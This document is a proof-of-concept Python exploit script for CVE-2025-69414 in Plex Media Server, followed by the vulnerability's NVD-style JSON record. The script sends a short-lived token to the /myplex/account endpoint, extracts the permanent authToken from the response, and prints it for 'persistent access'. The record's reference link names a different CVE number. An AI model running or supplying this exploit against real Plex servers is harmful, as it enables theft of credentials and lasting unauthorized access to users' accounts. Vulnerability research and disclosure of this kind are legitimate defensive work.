CVE-2025-69414

import requests import json # CVE-2025-69414 PoC - Plex Media Server Permanent Access Token Leak # Description: Exploit the /myplex/account endpoint to retrieve permanent token using transient token def exploit_plex_token_leak(plex_server_url, transient_token): """ Exploit CVE-2025-69414 to obtain permanent access token Args: plex_server_url: Target Plex Media Server URL (e.g., 'https://plex.tv') transient_token: Valid transient/short-lived access token Returns: Permanent access token if exploit successful, None otherwise """ headers = { 'X-Plex-Product': 'Plex API', 'X-Plex-Version': '1.0', 'X-Plex-Client-Identifier': 'CVE-2025-69414-POC', 'Authorization': f'Bearer {transient_token}' } try: # Target endpoint that leaks permanent token response = requests.get( f'{plex_server_url}/myplex/account', headers=headers, timeout=10 ) if response.status_code == 200: data = response.json() # Extract permanent token from response if 'user' in data and 'authToken' in data['user']: permanent_token = data['user']['authToken'] print(f'[+] Permanent Token Obtained: {permanent_token}') return permanent_token print('[-] Exploit failed - check token or endpoint') return None except requests.exceptions.RequestException as e: print(f'[-] Request error: {e}') return None # Example usage if __name__ == '__main__': target = 'https://plex.tv' # Replace with actual transient token obtained through other means transient_token = 'TRANSIENT_TOKEN_HERE' permanent_token = exploit_plex_token_leak(target, transient_token) if permanent_token: print('[+] Exploit successful - use token for persistent access')

{"cve": {"id": "CVE-2025-69414", "sourceIdentifier": "[email protected]", "published": "2026-01-02T17:16:23.710", "lastModified": "2026-02-27T15:27:26.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plex Media Server (PMS) through 1.42.2.10156 allows retrieval of a permanent access token via a /myplex/account call with a transient access token."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:plex:media_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.42.2.10156", "matchCriteriaId": "7A4BA6A5-E87A-497B-85EE-F2EEA90B8740"}]}]}], "references": [{"url": "https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}